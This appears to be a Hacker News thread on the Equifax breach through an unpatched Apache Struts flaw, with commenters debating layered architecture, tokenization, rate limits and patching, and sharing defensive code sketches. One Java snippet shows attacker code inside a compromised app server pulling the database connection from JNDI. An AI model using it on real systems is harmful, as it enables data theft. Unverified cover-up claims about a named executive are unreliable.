In cryptography the operating assumption should always be that everything is known about your data except your key material, which is kept private.
> Yes, but the elephant in the room is that a credit bureau possesses that information in usable form. This can be taken care of by key management, where the individual owns the key and only one key is able to exist per individual at a time. Then, only those credit grantors who have been authorized by the individual are able to update or view the data.
This is what I mean by not meeting business goals. It is clearly a bad idea to give Grandma an irreplaceable key. But that's what this proposal is.
Wrong. It is your interpretation that this is an irreplaceable key. You are trying to say that a design is wrong, because you believe that your implementation would be wrong.
Uniqueness is a different property from replaceability. And replaceability is not necessarily the correct property to design for; key rotation and recovery from loss are. What you want is the ability to rotate keys and to recover from the loss of a key.
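One common way to get both properties is envelope encryption: per-record data keys are stored wrapped by a master key held elsewhere, so rotating the master only rewraps the small keys rather than re-encrypting every record. A minimal sketch using the Python cryptography library (a sketch of the pattern, not a claim about any particular vendor's implementation):

    from cryptography.fernet import Fernet

    # Master key lives in a separate key service/HSM; data keys are stored
    # wrapped (encrypted) next to the records they protect.
    master_key = Fernet.generate_key()
    master = Fernet(master_key)

    data_key = Fernet.generate_key()             # per-record (or per-user) key
    wrapped_data_key = master.encrypt(data_key)  # what actually sits in storage

    record_ciphertext = Fernet(data_key).encrypt(b"ssn=000-00-0000")

    # Master key rotation: touch only the wrapped keys, not the data.
    new_master = Fernet(Fernet.generate_key())
    rewrapped_data_key = new_master.encrypt(master.decrypt(wrapped_data_key))

    # Recovery / read path: unwrap the data key, then decrypt the record.
    plaintext = Fernet(new_master.decrypt(rewrapped_data_key)).decrypt(record_ciphertext)
    assert plaintext == b"ssn=000-00-0000"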
Put machines with sensitive data on a private network. Have one machine (or one set of machines) connected to both the private network and the public network that proxies requests to the data machines. Proxy by parsing the original request and then rewriting it (i.e. don't just pass along the request). Rate limit and implement notifications on the data machines so that if the proxies are compromised, the attacker can't easily do a full data dump. Don't allow remote administration, only physical (this rules out this architecture for most companies, but honestly, not a company like Equifax with incredibly sensitive info and where network locality is not a big issue).
To the remote administration point, if you have this architecture and still open up the private data-network to remote SSH connections, you're at least limiting the attack space to vulnerabilities in SSH and the network stack/firewall on your ingress server, but not vulnerabilities in the application server. Much better than nothing.
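A hedged sketch of the parse-then-rewrite proxy described above. The internal hostname is hypothetical; the point is that nothing from the client request is forwarded verbatim.

    import re
    import urllib.request

    # Only a validated record ID survives parsing, and a brand-new request is
    # built toward the data network. No client headers or body are forwarded.
    DATA_TIER = "http://records.private.example"   # reachable only from this host (hypothetical)
    RECORD_ID = re.compile(r"^[0-9]{1,12}$")

    def handle(client_path: str, client_headers: dict) -> bytes:
        # Expect exactly /records/<numeric id>; everything else is dropped.
        parts = client_path.strip("/").split("/")
        if len(parts) != 2 or parts[0] != "records" or not RECORD_ID.match(parts[1]):
            raise ValueError("request rejected by proxy")
        # Rebuild the upstream request from scratch.
        upstream = urllib.request.Request(f"{DATA_TIER}/records/{parts[1]}")
        with urllib.request.urlopen(upstream, timeout=5) as resp:
            return resp.read()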
If you look at the CVE, it's literally plain shell commands as strings in the Content-* headers. These commands would appear to be local with whatever user the app is running as.
And that's the ridiculous thing: this is actually a fairly easy thing to protect against. Why the hell did the webapp servers have direct access to the database? If there was a service in the middle mediating requests, that would have been another line of defense. Sure, maybe _that_ service might have holes, but it'd be another hurdle the attacker would have to clear.
>It's too easy to handwave this away as "well, get a better architecture." Everyone knows that; the hard part is, what architecture?
Have you read Linux firewall documentation? The first example is the old school public->DMZ->private setup. So your web server got hacked? That means what? Your database is across a single port through the firewall, and ACLs mean that any traffic arriving at that port from the DMZ CIDR can only do the limited set of queries that provide single-person-at-a-time access. SSH from the hacked box to the database? You'd need a zero-day for the firewall (because 22 isn't open from there), and a zero-day for sshd (because it's keys only). I know this and I'm not one of our hundreds of security people. (And as I'm not the security guy, if any actual security guys want to school me here, please do so!)
Sure, I agree that business peeps will say "Oh that's too expensive, I don't care", but let's not pretend that we don't know how to do this.
Be clear, if you are the IT security guy, and you agree to bow down to "business" people (you're a business person) who tell you "No, that's too complicated", then just be clear that you are getting fired when the shit hits the fan.
I feel there are a couple of places where this doesn't reflect reality.
The first, very likely scenario is that business logic says a web application needs certain data, where "certain" is "pretty much all of it". So your application server in that DMZ needfully holds a database credential.
Which in turn is a credential an attacker can use to access "pretty much everything".
> single person at a time
The majority of modern web applications will open a series of database connections. One application server limited to one DB connection for a public application is probably going to break the app.
Overall, security people don't get a choice about "bowing" to business people, in most of my experience. I'm not saying scapegoating never happens, but this
> then just be clear that you are getting fired when the shit hits the fan.
What do you think the alternative is? Tell them you're quitting early on because they won't do what you say?
I can present risks, and offer mitigations. More often than not, some get through easily, some never will, and it's those on the fence you work on constantly improving.
Heh. I don't mean the database can do only one query at a time. I mean the db is set up so the front end can't just hit it with a SQL query to dump the database.
Now, sure, if the front ends query 10% of all records every day, then yeah, it only takes 10 days to get all the data, one query at a time, without triggering any alarms. They had 75 days. I don't know though, on any given day, what percentage of the population are getting credit checked? And did they have any alarms?
You don't even allow that. I'll use REST as an example because that's what I use, but any form of RPC would work.
App server has no database access. No DB credentials, and no network access to the DB. It does, however, have access to a service that sits in front of the DB. It can ask the service:
GET /users/10
... and that's it. It gets one record. The service fronting the DB has a single query it can execute:
SELECT * FROM users WHERE ID = ?
Sure, if someone can compromise the user-data service, then they have more access. But that's what defense-in-depth is: if an attacker compromises one system of yours, they don't get the crown jewels: they need to keep going, and each new attack they need to mount costs them more, and sometimes even makes them fail.
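A minimal sketch of that user-data service. Flask and SQLite stand in for whatever the real stack would be, and it assumes a users table already exists.

    import sqlite3
    from flask import Flask, jsonify, abort    # assumes Flask is installed

    # The only thing an app server (or an attacker who owns one) can ask for is
    # a single record by ID, via a single parameterized query. No generic SQL
    # ever crosses this boundary.
    app = Flask(__name__)
    db = sqlite3.connect("users.db", check_same_thread=False)   # assumes a 'users' table

    @app.route("/users/<int:user_id>", methods=["GET"])
    def get_user(user_id):
        row = db.execute(
            "SELECT id, name FROM users WHERE id = ?", (user_id,)
        ).fetchone()
        if row is None:
            abort(404)
        return jsonify({"id": row[0], "name": row[1]})

    # app.run(host="10.0.0.5")   # bound to the internal network only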
But the development world has been turning on stored procedures for a while. You've got popular frameworks actively shunning the concept[0].
I've seen the topic on HN before and it's generally been the view that there is rarely a use case in modern times. We can't suddenly say everyone is expected to have everything in a stored procedure now that it's convenient.
True, enforcing stored-procedures-only is an antiquated methodology that is frowned upon these days. But not because it doesn't work -- rather because it's a bad idea to put your business logic in the database itself, which is what usually happens.
The more modern equivalent, is to just have an "app server" that sits in between the web (DMZ) and db tiers. The app server can basically be just another web server that provides an API for the actual web server to use. So from the web server's point of view, it still has restricted access, but you get to write all the rules in your normal backend architecture/language rather than building them with stored procedures and triggers and all that.
Besides, the "rarely a use case" isn't the same as "never", and if you can envision any scenario where it would be worthwhile to go to extraordinary means to ensure security, I think "we have all the data needed to commit identity theft on half of all Americans" counts. If stored procedures is a convenient way for you to limit the impact of a breach from your web server/DMZ, then do it if you have data that important. Do 20 other things that are inconvenient too if it gives you defense in depth.
We use stored procedures. We actually use them for a different reason: we treat the database server as an application server that happens to use a proprietary binary protocol instead of HTTP. Its API is exposed using stored procedures. This allows us to maintain and update the database data model independently of the "traditional" web tier. DB experts can work on the most effective data model without hunting through client source code.
It also means that we can use access controls on the API (the stored procedures).
In my experience, allowing anyone to hit a database with SQL leads to poor code quality, bugs and performance problems. And security issues.
If the business people at Equifax didn't spend through the nose on security then they are negligent, quite probably criminally so.
You can argue that Target is not in the "we need to secure this treasure trove of data" business and so them leaking 40 million credit cards is just an unfortunate accident.
But when you sit on the PII of 150 million people then you need to be top notch security wise. I am sure the eventual, inevitable court cases will appreciate a company culture where admin/admin is acceptable.
> just be clear that you are getting fired when the shit hits the fan.
How many jobs are out there for people who tell the "business" people what they want to hear, versus people who tell them hard truths about security? How many businesses succeed despite lax security -- gambling irresponsibly, yet winning?
Yep. You can do all that. At the end of it, a box somewhere needs to be able to access the data. That box has access. You handwave it as single-person-at-a-time queries. But on any given day, they have to run tens or hundreds of thousands of those queries. Even if people aren't accessing their credit info, there is plenty of automation that does. Meaning if you pop that single person query box, you can scale up the queries by a factor of ten without raising any flags directly.
It's much better, certainly. Companies should do that. But it's not obviously a panacea.
Conceivably, the attackers spent the 75 days downloading the 143,000,000 records, 2,000,000 records per day, and managed to trigger no scaling alarms as a result. Or perhaps there were no alarms. I wonder if we'll ever know.
Given the vagueness of their statements about the 143M records which "may" have been affected, it seems likely that they weren't logging the relevant queries in any useful way, and that is definitely an architectural failure.
TFA says Equifax learned of the breach by detecting anomalous traffic. I'd say there was an alarm, but it didn't do anything to actually stop the attack.
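A sketch of an alarm that acts instead of just observing: count records served per credential per day and cut access once volume blows past a baseline. The thresholds are invented for illustration.

    import datetime
    from collections import Counter

    DAILY_BASELINE = 50_000          # typical records served per credential per day (made up)
    HARD_LIMIT = 5 * DAILY_BASELINE  # beyond this, stop serving and page a human

    served_today = Counter()

    def record_served(credential: str, today=None):
        today = today or datetime.date.today()
        served_today[(credential, today)] += 1
        count = served_today[(credential, today)]
        if count == DAILY_BASELINE:              # soft alarm: notify
            print(f"ALERT: {credential} hit baseline volume on {today}")
        if count > HARD_LIMIT:                   # hard stop: deny further reads
            raise PermissionError(f"{credential} exceeded daily volume limit")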
I worked for a company that was doing at least 100k credit checks each day. A lot of it was batched - we would get a file with 25k records and had to process it and send back the results (usually HTML reports and/or decisions based on them).
What I want to say is, it wouldn't surprise me to hear that the three main bureaus process millions of requests per day.
Oh, and also - all bureaus were replying to a request in less than a second. Quite impressive.
Thank you for backing up my claim with data. I was admittedly making an educated guess, but there was a nagging "hundreds of thousands? Are you sure?" feeling.
This underscores the importance of figuring out a better architecture. And not just for credit bureaus.
It is remarkable how resistant people are to the idea that you need to be patient while the world changes. Everyone is out for blood and gives not a fleeting thought about what would come after such a purge.
Batch processing on encrypted data is absolutely OK. For example, you can just pull row-level keys and run your audited and signed binary. Also, the pipeline should be kept away from the frontend.
I'm not an expert but I think it should already be documented in the compliance doc.
If you can batch process the dataset, an attacker can do the same thing. They take whatever creds the batch script is using and use them directly. If the program only runs from a certain box, then they run their modified script on that box.
"Well don't let that happen!" Nope, not that easy. This threat model concedes that the hackers have RCE. They're on your network. That's why they can do this.
"All binaries are audited and signed.", which makes it trackable. And the runtime environment is also isolated and uses different set of access permissions. I'm not saying it is impossible. Just layers and layers. For internal stuffs, Google's beyondcorp is a good start.
There is no such thing as a runtime environment that (a) attackers gained RCE into, and (b) the box with the sensitive data can verify the incoming connection is from an audited, signed binary.
Simply put: if you have RCE into an app, then that breaks all the guarantees of that audited, signed binary. You can make it sing and dance and ask for a thousand rows instead of ten; you can do whatever you want to it. The modifications happen in memory, not on disk, so even if they don't persist you can still modify the app.
Why would you ever allow public web access to a machine that can do that level of batch processing? That sort of thing should be accessible only through internal-only tools protected by a VPN.
You'd be amazed at how easy it is to exploit internal tools once you're inside someone's network. Internal tools were the juiciest targets: a perfect storm of "created by an unqualified team that no longer works here" and "nobody realized it's still been running for a year."
It can work, but evidence seems to imply this strategy makes the situation worse. I'm not sure what to do with this information other than to relay the experience. It's one of those tricky counterintuitive facts.
Oh, definitely agree. But I'm talking about "internal" tools that aren't actually internal, but are exposed on the public internet. At least if they're behind a VPN there's a hurdle to jump before you get to those tools.
I disagree with the fatalist tone. Sure, it can be hard for big, slow moving businesses to take a time out from writing million dollar checks to C-suite executives to spend money on a competent operations and security team. But it can happen and in this case it should have happened.
I don't think "better architecture" is handwavy. If you have old legacy apps that can't be updated and maintained, don't provide them with a path to the public internet. Or front then with some infrastructure and adequate alarms to detect something going wrong.
I think it's reasonable to respond to a CVE with an update to your app or infrastructure within one week. Most of the time rapid testing will be fine, as you're patching a library or component, like Struts or Tomcat.
These companies are hardly providing 100% uptime, in the case where an update like this needs a rollback, it won't be a big deal. If you have a good team and you spend the money on them.
Companies that store personal information at that level should be required to implement PCI-DSS level security. This includes going through the auditing process.
You can work to not implement the security standards, and then try to fake your way through the audit. At that point you are not ignorant of proper security, you are actively endangering the users, and your right to hold PII (Personally Identifiable Information) should be revoked.
I don't buy your observation that all big-corps are kind of equally sloppy security-wise. Here are 2 examples:
- Equifax login form does not use STS header.
- equifax.com/business exposes full server version (Server:Apache/2.4.27 (Win64) OpenSSL/1.1.0f mod_log_rotate/1.0.0)
I'm not a security person, but those two seem way out of industry standards for security-aware web services.
I was sure the vulnerability was going to be an API key hard coded in the app which allowed retrieving any credit report over the API. That the app was "merely" sending some calls unencrypted was a total let down.
API creds maybe could have been excusable as a mistake which got overlooked, or even as permissions which changed. In the context of a credit monitoring app, the use of HTTP is really, really, really bad and can't really be excused. It would be interesting to know if there are more issues, but a lot of white-hat researchers stay away from such things when there's no official bug bounty program, because of the Computer Fraud and Abuse Act. Interacting with the API outside its intended use by the app could be considered computer intrusion, and it might be advisable to stay away from legal grey areas right now when it comes to Equifax research.
My guess is the problems here were more banal: the account running Apache had too much privilege (maybe even root?), and the vulnerability was left unpatched for a long time (weeks at least). If you can execute arbitrary commands on a web server, it's essentially impossible for any architecture to keep your hands off any (or all) data that server needs access to for its normal functions.
If they were doing it right, the DB would be encrypted and the PCI fields would be tokenized; then, even if you get dumps of the DB, you don't have anything you can use.
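As a rough illustration of what tokenization buys you (the class below is hypothetical, and a real vault would persist its mapping in an encrypted, access-controlled store rather than in memory): the application database only ever holds opaque tokens, so a dump of it yields nothing directly usable.

```java
import java.security.SecureRandom;
import java.util.Map;
import java.util.concurrent.ConcurrentHashMap;

// Illustrative token vault. The web/application tier stores only the tokens;
// the token-to-value mapping lives in a separately secured service.
public class TokenVault {
    private final Map<String, String> tokenToValue = new ConcurrentHashMap<>();
    private final SecureRandom random = new SecureRandom();

    // Replace a sensitive value (PAN, SSN, ...) with a random token.
    public String tokenize(String sensitiveValue) {
        byte[] bytes = new byte[16];
        random.nextBytes(bytes);
        StringBuilder token = new StringBuilder();
        for (byte b : bytes) {
            token.append(String.format("%02x", b));
        }
        tokenToValue.put(token.toString(), sensitiveValue);
        return token.toString(); // this is all the app database ever sees
    }

    // Detokenization stays inside the vault's trust boundary and should be
    // authenticated, audited, and rate-limited.
    public String detokenize(String token) {
        return tokenToValue.get(token);
    }
}
```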
Was it just a single CVE? That was the entry point, but was their network just wide open after that? Or did they have to procure more CVEs to get past SSH, firewalls, etc.?
I think it's about time we had the equivalent of the NTSB to review and publish, publicly, what happened and what the failures were. Nobody died, but certainly many people will be affected by this for years to come.
Wow, MarketWatch is right. They are trying to erase Susan Mauldin (the former CISO), she is not even mentioned in this article. Does anyone with Google juice have a way to recover the interviews that are referenced in [1]?
I watched them before they came down on Sept 10, and they were eye opening. I can say with certainty that the transcripts are not complete, because I remember "resistance to cloud is futile" and other such gems which are nowhere to be found in the partial transcripts that you can still find on the linked archive.is pages.
Some of the best software developers I've known were music majors. I know nothing about Susan Mauldin, including any of her other qualifications or lack thereof, but implying someone is only qualified to do what their college major was tells me this author is a complete idiot.
That is not my purpose. I have no idea what her qualifications are, I saw the LinkedIn page and it contained almost no information. That is hardly relevant.
I personally believe that she was backed into a corner, based on the interviews I watched from some time before the breach (which I can't show you, and I won't link to the transcripts because I know they are incomplete and far less impactful).
She sounded to me, exactly like a person who was given a budget that was effectively no budget, and then put into this role because people with a larger stake were sure that she would comply when they said "this is your budget, and not a penny more." I know exactly what that is like, because I have been made CIO and put in that position before. (I'm sure she was better paid than I was...)
There is absolutely 100% a coverup going on. I am so bummed that I did not save the interviews when I first watched them. You would agree too, if I could show you.
Edit:
Here is the transcript, but with the disclaimer that it is 100% not the full transcript. Although it is in her own words. Make your own judgement about her qualifications please.
"I always say that given enough time, we can secure anything and find a way to say yes to it and business-driven CISOs are of that mind"
It's really a pretty balanced interview. This is what she said. There was a second interview, but I'm a lot more incensed that this information is being suppressed than at any one thing she says. I want to be furious when she says things like
"If a CISO can come up with a list of controls that he/she is comfortable with, then by and large the evidence proves that those controls are working effectively and are going to satisfy the elements of any framework that you use."
but all this interview really can show is that she knows some jargon, and her mindset. And I think it's really (truly, not in a figurative sense but literally) criminal that this information is suppressed. This is the case study of an interview that reveals insights from the mind of a CISO before disaster strikes... I literally don't even care that she was a Music major, how can anyone justify taking this down?
It's not just potentially criminal, it's also unconscionable. This should be preserved for posterity, I want to tar and feather the company, but I want to hear more from Susan Mauldin about what went wrong at Equifax.
I don't just want this interview back online, I want there to be a follow-up to this interview! And if it takes a pardon from Trump to make that happen, let's start the conversation.
> She sounded to me, exactly like a person who was given a budget that was effectively no budget, and then put into this role because people with a larger stake were sure that she would comply when they said "this is your budget, and not a penny more." I know exactly what that is like, because I have been made CIO and put in that position before.
That's the root cause here. The same thing happens over and over. They find ways to save more money, get the rewards, and the rest of us get screwed.
Bingo. You said it, that's exactly why I want to hear more from Susan Mauldin. (That, and the fact that there's someone evidently who doesn't want to hear more from Susan Mauldin...)
Edit: Well, I found one video (11m30s), were there more?
-----
Edit:
From a quick check, this seems to be the same interview that was transcribed, though I'm not sure if it's the entire interview or even the one you were looking for:
There was a second interview with Cazena that looked a lot like the first interview, but the topic was different. It looked like they were possibly recorded on the same day.
Edit: Bless you for doing this, however you found it.
I haven't watched it yet, but I fetched a copy. (Edit: it looks like the first interview.)
If it matches the transcript, it may not be the one I'm looking for: the one I'm looking for has the expression "resistance to the cloud is futile" in it (which I didn't see in the transcript). It might have been the follow-up interview that had this phrase in it. From reading the first transcript, it looked pretty accurate from what I could remember.
It's too bad we don't have that transcript. I honestly can't remember much about that second interview. Didn't think I'd be here in this position today, trying to retrieve it for the public interest.
Edit: This one does have the quote about the Borg in it. So I remember absolutely nothing about Part 2 of the interview, and we still don't have a copy. But this is something I can't find anywhere else on the internet for now. Thanks!!!
Yeah, I found their article from links here, so I reached out to them via email right after posting it here. According to a later email, they independently found my HN post above a bit later.
Looks like the embedded version on their page is missing about 1m30s of the interview, though.
None of the listings above tell us what exactly she is doing as VP of those firms. There's no detail on whether she fulfills a technical role or an administrative one.
Well sure, I don't want to blame a person though. I'm sure there's enough blame to go around. It sure looks fishy though that this person is being swept under the rug.
Either she is the scapegoat, or she knows who is responsible for this. I'd love to have her on record to testify about the culture and what happened some time before they've effectively paid her to go away, and stashed her somewhere off the coast of Bermuda.
Equifax "believes" that the hackers got in on May 13. They had some kind of intrusion detection system that finally detected the intrusion on July 29. 5 months after the "Critical" CVE alert went out. During that time security vendors were adding firewall rules to stop the attack. But apparently Equifax didn't have any other security in front of the Struts server.
That just seems like unconscionable incompetence and malpractice for such a high value target.
> They had some kind of intrusion detection system that finally detected the intrusion on July 29.
If they had some sort of intrusion detection system, I gotta think they would have picked up on this in days, not more than 2 months later.
I feel like this is one of those situations where a dev is saying something like "where is all of the CPU on this database going?" or "Why is the network connection so slow?" and digs into it and finds some strange behavior...
- In addition, credit card numbers for approximately 209,000 U.S. consumers, and certain dispute documents with personal identifying information for approximately 182,000 U.S. consumers, were accessed.
This looks really bad. I don't see the point of letting them operate anymore. They utterly failed at the single thing they were supposed to do.
The business they are in is supplying information to creditors about the credit-worthiness of potential customers. AFAIK they have succeeded at this.
I don't want to downplay their security failure. It's obviously really bad, but saying that security was the "single thing they were supposed to do" is false.
You are right, it was hyperbole, but I still don't see why they should be allowed to continue operating. Would you let a bank continue to operate after it had lost all its money?
Never mind, I guess too big to fail applies here as well.
Actually looking at the CVE made my stomach drop. That is a horrible horrible bug. Getting access to the shell while under the web app user's environment potentially means that all secrets were available either in the app server administration, the user environment, or in a readable file on the system. Effing yikes.
Also knowing how JNDI usually gets configured on app servers (sometimes with credentials and all) would have made recon ridiculously easy.
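To make that recon point concrete: code executing inside the compromised app server (which is exactly what RCE gives you) can ask the container for its configured datasource the same way the legitimate application does. The resource name below is a placeholder, not anything specific to Equifax:

```java
import java.sql.Connection;
import java.sql.SQLException;
import javax.naming.InitialContext;
import javax.naming.NamingException;
import javax.sql.DataSource;

// Runs inside the app server, i.e. in the attacker's injected code. The
// container hands over the datasource, credentials and all, because that is
// exactly what it exists to do for the application.
public class JndiRecon {
    public static Connection grabAppDatabase() throws NamingException, SQLException {
        InitialContext ctx = new InitialContext();
        // "jdbc/consumerDb" is a made-up resource name for illustration.
        DataSource ds = (DataSource) ctx.lookup("java:comp/env/jdbc/consumerDb");
        // From here the attacker has the same database access as the app itself.
        return ds.getConnection();
    }
}
```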
I think some have alluded to it, but what some people in the comments don't seem to understand is that RCE is an "all bets are off" type of situation. DEFCON 1 to be sure. Prevention is really the only good answer.
Failure to apply a patch for a two-month-old bug led to this entire nightmare scenario. What are some best practices to ensure that one's dependencies are always up to date?
Equifax requires its partners to have a fully implemented and tested patch management program, and audits annually (directly or via a third party) that they stick to it, which makes this situation even more hilarious.
Failure to patch wasn't the cause of this breach. The causes of this breach were:
1. Reliance on a consumer-grade component in a security-critical system holding high-value data.
The portal should have had a small, audited code base with secure coding techniques and minimal reliance on third-party components.
2. Excessive attack surface on a system holding high-value data.
The machine hosting the portal should never have had read access to SSNs. Sensitive data should have been "thrown over the wall" to a secure backend with a constrained interface. This would have greatly reduced the scope of the breach.
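A sketch of what a constrained interface might look like, with entirely hypothetical names; the important part is what it doesn't expose (no raw SSNs, no bulk export, no free-form queries):

```java
// Hypothetical contract between the public-facing portal and the data backend.
public interface CreditBackend {

    // Answers a yes/no identity question without ever returning the SSN.
    boolean verifyIdentity(String consumerId, String ssnLastFour);

    // Returns a derived score, not the underlying records.
    int creditScore(String consumerId);

    // Note what is absent: no getSsn(), no exportAllConsumers(), no raw SQL.
    // Bulk operations live behind separate authentication, auditing, and
    // rate limits on the backend side, never behind the web tier.
}
```

An attacker with RCE on the portal can still abuse whatever this interface allows, but the blast radius is a rate-limited trickle of derived answers rather than 143 million raw records.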
If you're lazy and dealing with a non-critical system, `yum update --security -y` as a nightly cron job goes a long way.
If you're working on something important, say critical national economic infrastructure, you do the equivalent with automated staging and testing happening before any potentially breaking changes are made to live servers.
Yum isn't going to patch Struts, though. That's an application package.
There are services that monitor your package configuration(s) and let you know when something has been updated.
There are also mailing lists. Unless you're a Node developer, you probably only have a couple dozen dependencies in your app. Subscribe to them.
Finally, you can just check in your lockfile and update packages as part of your dev builds, then commit it whenever something changes. Your CI/CD will make sure you are always running the latest version of every application dependency in production.
Although I'm sure Equifax is not going to be very forthcoming about this aspect of it, not having plaintext passwords visible after logging in as admin/admin also helps.
Nobody's saying music majors are incompetent. But this woman's sole qualification is that. She is not a "kernel dev hacker" AFAICT. Do you know if she is in any way qualified to be CSO of a huge corp handling so much sensitive customer data?
She held another position as director of security, but no hands-on technical roles ever. It really looks like the resume of a middle manager who moved to the C-suite. I didn't see anything that indicated she was technical.
"Don't hire a music major" and "don't hire an unqualified person" are not equivalent statements. Someone's major in college is only one small part of that picture.
I have known people without degrees (or without relevant ones) that learned on their own and were great. I have known people with a CS degree that were terrible.
For everyone patting themselves on the back for how much better they are at securing their data: realize that for well over 80% of incidents the attack vector is email and social engineering. Look at red-team exercises run by competent teams and try to honestly answer whether they would have succeeded with that tactic at your company. So yes, having much better practices than what we see here is very important, but it will not really help much if you are being targeted by a competent adversary.
Gotta admire the artful way they gave the appearance of disclosure while avoiding answering the most damning question: why did it take so long for them to patch Struts?
"The particular vulnerability in Apache Struts was identified and disclosed by U.S. CERT in early March 2017."
"Equifax's Security organization was aware of this vulnerability at that time, and took efforts to identify and to patch any vulnerable systems in the company's IT infrastructure."
?????????!!!!!!??????
"While Equifax fully understands the intense focus on patching efforts, the company's review of the facts is still ongoing."
I have a different question. So here's their timeline:
MARCH 2017 - Vuln in Struts is disclosed by CERT.
MAY 13 - Initial intrusion happens according to FireEye's later analysis
JULY 29 - Equifax notices weird activity.
JULY 30 - Equifax notices more weird activity.
JULY 30 - Equifax takes down affected web site
JULY 30ish? - Equifax realized vuln was Struts. Patches. Puts site right back up.
AUG 2 - Hire FireEye to check things out
(weeks) - FireEye assesses situation and presumably Equifax panics
SEP 7 - Equifax makes intrusion public, offers self-described "comprehensive package" including the web site "so that consumers can quickly and easily find the information they need".
At SOME point, they kind of shove in the statement that the following entities were notified:
* FBI
* all U.S. State Attorneys General
* other federal regulators.
My question is WHEN did this happen? It's my understanding there are rules-- state and federal-- about when law enforcement (and affected parties) need to be notified on a breach of this size involving this type of sensitive information.
I hope Equifax will be learning from this, but can you tell your CEO that your core business must be shut down for 3 weeks as you upgrade and rebuild the system?
Yes, the risk is much higher than the cost. From the article:
> The company's internal review of the incident continued. Upon discovering a vulnerability in the Apache Struts web application framework as the initial attack vector, Equifax patched the affected web application before bringing it back online.
That bullet point lies between the "July 30th" and "August 2nd" bullet points. Based on that timeline, the vulnerability took days to patch.
The reason they don't is that they just don't care... and for their business that's the rational decision. Data security isn't as core to their business as it is to a bank. If a bank has a breach, bank accounts get drained. If Equifax has a breach, it's annoying but manageable fines and their CEO gets grilled in a few congressional hearings.
Equifax's core business is about giving out credit scores. I'd bet their biggest fear is giving someone a high score when they deserve a low one. Data breaches, moderately inaccurate information... a nuisance, but a sideshow.
Having a remote execution exploit shouldn't mean keys to the kingdom. I find it hard to believe that this company, whose whole business is electronic, didn't adapt its technology stack to mitigate this type of attack and limit the scope of a data leak. I wouldn't be surprised if Struts has another exploit of similar magnitude; what then?
They might as well be running their business on a cluster of tomcat servers sitting atop sqlite.
Hopefully they don't recover from this - they should not have the data they possess if they cannot mitigate risk.
They are really in deep trouble and need to manage the story carefully. If people start freezing their credit history on a broad basis (one of the most effective means to protect against abuse), their and their competitors' ability to sell data to other parties will suffer (see also https://wolfstreet.com/2017/09/15/equifax-sacks-2-executives... )
What about storing sensitive data in something like an HSM that rate-limits access, so you could only access, let's say, 10,000 records per day?
Yes, developing against such a system might be annoying (think about updating a field across all records).
But it feels to me that we need a way to rate-limit access to sensitive data, to prevent a wholesale dump in a short time. You'd still need other systems in place to catch a hacker lurking around for months until they get all the data.
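A minimal sketch of that kind of quota, assuming a hypothetical guard sitting in front of the record store (a real deployment would enforce the limit inside the HSM or vault itself and alert loudly when it's hit):

```java
import java.time.LocalDate;

// Illustrative daily access quota for a sensitive record store.
public class QuotaGuard {
    private final int dailyLimit;
    private int usedToday = 0;
    private LocalDate window = LocalDate.now();

    public QuotaGuard(int dailyLimit) {
        this.dailyLimit = dailyLimit;
    }

    // Returns true if this lookup is allowed; false once the daily budget is spent.
    public synchronized boolean tryAccess() {
        LocalDate today = LocalDate.now();
        if (!today.equals(window)) {   // roll the window over at midnight
            window = today;
            usedToday = 0;
        }
        if (usedToday >= dailyLimit) {
            return false;              // deny, and ideally page a human
        }
        usedToday++;
        return true;
    }
}
```

Something like `new QuotaGuard(10_000)` matches the 10,000-records-per-day figure above; the hard part, as you say, is designing the legitimate batch workflows so they don't need to blow through the quota.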
I just had a scamming debt collector call me about a debt I already paid off to another collection company. They had all the right information. I suspect it has to do with the hack. Watch out for First Equity Alliance.